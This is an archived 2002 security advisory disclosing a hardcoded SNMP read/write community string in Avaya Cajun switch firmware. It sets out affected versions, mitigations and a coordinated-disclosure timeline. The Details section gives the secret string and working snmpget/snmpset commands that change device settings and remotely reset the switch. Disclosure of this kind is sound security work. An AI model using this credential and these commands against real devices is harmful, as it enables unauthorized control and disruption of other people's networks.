OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Jacek Lipkowski (sq5bpf_at_andra.com.pl)
Date: Mon Aug 05 2002 - 12:01:24 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    1. Problem Description

    There exists an undocumented SNMP r/w community string in firmware for
    Avaya Cajun P33x series hardware. This allows anyone having SNMP access to
    the device to administer it.

    2. Tested systems

    The following versions were tested and found vulnerable:

    Avaya Cajun P330T software version 3.8.2 and 3.9.1
    Avaya Cajun P333R software version 3.8.1 and 3.9.1

    Additionaly firmware for P130, M770-ATM and M770 Supervisor (M-SPX, M-SPS)
    was found to be vulnerable.

    3. Details

    Various Cajun firmware contains an undocumented community r/w string NoGaH$!
    To test try:

    sq5bpfhash:~$ snmpget 192.168.0.3 'NoGaH$!' system.sysName.0
    system.sysName.0 = AsnNull
    sq5bpfhash:~$ snmpset 192.168.0.3 'NoGaH$!' system.sysName.0 s 'Hello there :)'
    system.sysName.0 = Hello there :)
    sq5bpfhash:~$ snmpget 192.168.0.3 'NoGaH$!' system.sysName.0
    system.sysName.0 = Hello there :)

    Reset a Cajun switch remotely (fun party trick):

    sq5bpfhash:~$ snmpset 192.168.0.3 'NoGaH$!' .1.3.6.1.4.1.81.7.7.0 i 1
    enterprises.81.7.7.0 = 1

    4. Recommendations

    As always it is good administrative practice to block SNMP at the
    firewall, especially now after the release of the PROTOS SNMP testing
    suite. However, the vulnerability is also present on P333R router
    interfaces, which have a higher chance of being exposed to the outside
    world:

    sq5bpfhash:~$ snmpget 192.168.0.4 'NoGaH$!' system.sysDescr.0
    system.sysDescr.0 = Avaya Inc. - P333R , SW version 3.9.1 , CS 2.4

    If for some reason the user is unable to upgrade to a fixed version, in
    order to mitigate the bug one can restrict SNMP access using the
    'set allowed managers' command, which appeared in recent Cajun firmware.

    5. Vendor status

    AVAYA was informed on 27 May 2002. The vendor responded on May 28 2002. As
    the vendor proved responsive and worked promptly on the problem, I have
    agreed to release the information after the release of fixed software. The
    fixed software has been released on July 4, and is avaliable from the
    Avaya support site http://support.avaya.com. Official AVAYA security
    advisories are located at http://support.avaya.com/security/

    6. Disclaimer

    Neither I nor my employer is responsible for the use or misuse of
    information in this advisory. The opinions expressed are my own and not
    of any company. Any use of the information is at the user's own risk.

    Jacek Lipkowski sq5bpfandra.com.pl

    Andra Co. Ltd.
    ul Wynalazek 6
    02-677 Warsaw, Poland
    http://www.andra.com.pl